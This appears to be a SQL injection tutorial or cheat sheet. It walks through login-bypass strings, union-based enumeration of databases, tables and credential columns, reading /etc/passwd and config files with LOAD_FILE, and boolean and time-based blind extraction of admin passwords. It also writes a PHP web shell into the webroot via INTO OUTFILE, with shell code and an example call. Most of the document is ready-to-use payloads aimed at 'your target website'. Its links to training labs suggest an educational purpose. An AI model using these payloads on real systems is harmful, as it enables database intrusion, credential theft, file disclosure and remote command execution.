SQL injection attacks are a type of injection attack, in which SQL commands are injected into data-plane input in order to affect the execution of predefined SQL commands.
Subverting Query Login used to bypass authenticatio of login page . In this technique, hacker used true statement ' or 1=1 / ' or '1'='1'-- - to bypass application query or user credentials matching. Some True Statement Payload :
' or '1' = '1
' or '1' = '1’
' or '1' = '1 -- -
' or '1' = '1 #
👁️🗨️ For More Payload check payload all things github repo https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
In simple cases, the output of both the intended and the new query may be printed directly on the front end, and we can directly read it. This is known as In-band SQL injection, and it has two types: Union Based and Error Based.
Get the PHP or SQL errors in the front-end
Get Fixed Column number and Uses Union query to get database information
Find out injection parameter using fuzzing tools or manually
Use Given below payoad
Payload URL Encoded
' %27
" %22
# %23
; %3B
) %29
If we get sql error , there has error based SQL injection and then, Use SQL Map for Automatic SQL Injection Pen-Testing / Manually Testing
👁️🗨️ For More Payload check payload all things github repo https://github.com/swisskyrepo/PayloadsAllTheThings/tree/master/SQL%20Injection
find out actual column number using order by / order by -- - operation
use actual column number with union operation
example: ' union select 1,2,3-- -
check which column number show in your target website
use union base payload in perfect column number to exploit database
mysql> SELECT SCHEMA_NAME FROM INFORMATION_SCHEMA.SCHEMATA;
' UNION select 1,schema_name,3,4 from INFORMATION_SCHEMA.SCHEMATA-- -
' UNION select 1,TABLE_NAME,TABLE_SCHEMA,4 from INFORMATION_SCHEMA.TABLES where table_schema='dev'-- -
Here , dev is database name which will replace to your target database name
' UNION select 1,COLUMN_NAME,TABLE_NAME,TABLE_SCHEMA from INFORMATION_SCHEMA.COLUMNS where table_name='credentials'-- -
Here , credentials is table name whick will replace to your target table name
' UNION select 1, username, password, 4 from dev.credentials-- -
Where username and password are column name , dev is database name , credentials is table name
SELECT USER()
SELECT CURRENT_USER()
SELECT user from mysql.user
SELECT super_priv FROM mysql.user
' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user-- -
' UNION SELECT 1, super_priv, 3, 4 FROM mysql.user WHERE user="root"-- -
' UNION SELECT 1, grantee, privilege_type, 4 FROM information_schema.user_privileges-- -
Now that we know we have enough privileges to read local system files, let us do that using the LOAD_FILE() function. The LOAD_FILE() function can be used in MariaDB / MySQL to read data from files. The function takes in just one argument, which is the file name. The following query is an example of how to read the /etc/passwd file:
SELECT LOAD_FILE('/etc/passwd');
Example:
' UNION SELECT 1, LOAD_FILE("/etc/passwd"), 3, 4-- -
We know that the current page is search.php. The default Apache webroot is /var/www/html. Let us try reading the source code of the file at /var/www/html/search.php.
' UNION SELECT 1, LOAD_FILE("/var/www/html/search.php"), 3, 4-- -
' UNION SELECT 1, LOAD_FILE("/var/www/html/config.php"), 3, 4-- -
Example
' union select 1,'file written successfully!',3,4 into outfile '/var/www/html/proof.txt'-- -
Web Shell Upload:
' union select "",'<?php system($_REQUEST[0]); ?>', "", "" into outfile '/var/www/html/shell.php'-- -
Basic PHP Web Shell:
<?php system($_REQUEST['cmd']); ?>
OR
<?php system($_GET['cmd']); ?>
Example :
url/upload_file.php?parameter=commnad
http://cyberteach360.com.bd/shell.php?cmd=id
Boolean based SQL Injection refers to the response we receive back from our injection attempts which could be a true/false, yes/no, on/off, 1/0 or any response which can only ever have two outcomes. That outcome confirms to us that our SQL Injection payload was either successful or not. On the first inspection, you may feel like this limited response can't provide much information. Still, in fact, with just these two responses, it's possible to enumerate a whole database structure and contents.
1.admin123' UNION SELECT 1;--
2.admin123' UNION SELECT 1,2,3;--
if response is true till 1,2,3 but flase in 1,2,3,4 ,the target column number is 3
admin123' UNION SELECT 1,2,3 where database() like 'some character%';--
example:
admin123' UNION SELECT 1,2,3 where database() like 's%';--
Sequentially change the character and check the respons is true or flase suppose we got the database name :sqli_three
admin123' UNION SELECT 1,2,3 FROM information_schema.tables WHERE table_schema = 'sqli_three' and table_name like 'a%';--
Sequentially change the character and check the respons is true or flase suppose we got the table name :users
admin123' UNION SELECT 1,2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_three' and TABLE_NAME='users' and COLUMN_NAME like 'a%' and COLUMN_NAME !='id';
After,sequentially Repeating this process you will get column name. suppose, the column name username and another is password
admin123' UNION SELECT 1,2,3 from users where username like 'a%
After,sequentially Repeating this process you will get column username value and this is:admin.
admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a%
if you properly do this , you will get ***password and the credentials are username=admin ,password=3356 ***
A time-based blind SQL Injection is very similar to the above Boolean based, in that the same requests are sent, but there is no visual indicator of your queries being wrong or right this time. Instead, your indicator of a correct query is based on the time the query takes to complete. This time delay is introduced by using built-in methods such as SLEEP(x) alongside the UNION statement. The SLEEP() method will only ever get executed upon a successful UNION SELECT statement. So, for example, when trying to establish the number of columns in a table, you would use the following query:
admin123' UNION SELECT SLEEP(5);--
admin123' UNION SELECT SLEEP(5);--
If there was no pause in the response time, we know that the query was unsuccessful, so like on previous tasks, we add another column:
admin123' UNION SELECT SLEEP(5),2;--
if again no pause in the response time , increase column number like
admin123' UNION SELECT SLEEP(5),2,3;--
admin123' UNION SELECT SLEEP(5),2,3 where database() like 'u%';--
Here dabase name :sqli_four
admin123' UNION SELECT SLEEp(5),2,3 FROM information_schema.tables WHERE table_schema = 'sqli_four' and table_name like 'a%';--
Here table name:users
admin123' UNION SELECT SLEEP(5),2,3 FROM information_schema.COLUMNS WHERE TABLE_SCHEMA='sqli_four' and TABLE_NAME='users' and COLUMN_NAME like 'a%';
Here Column name username and password
admin123' UNION SELECT SLEEP(5),2,3 from users where username like 'a%
Here username:admin admin123' UNION SELECT 1,2,3 from users where username='admin' and password like 'a% Here password:pass SO the target login credentials username:admin password:pass
https://tryhackme.com/room/sqlinjectionlm
https://tryhackme.com/room/sqhell
https://academy.hackthebox.com/module/33/section/177
https://portswigger.net/web-security/sql-injection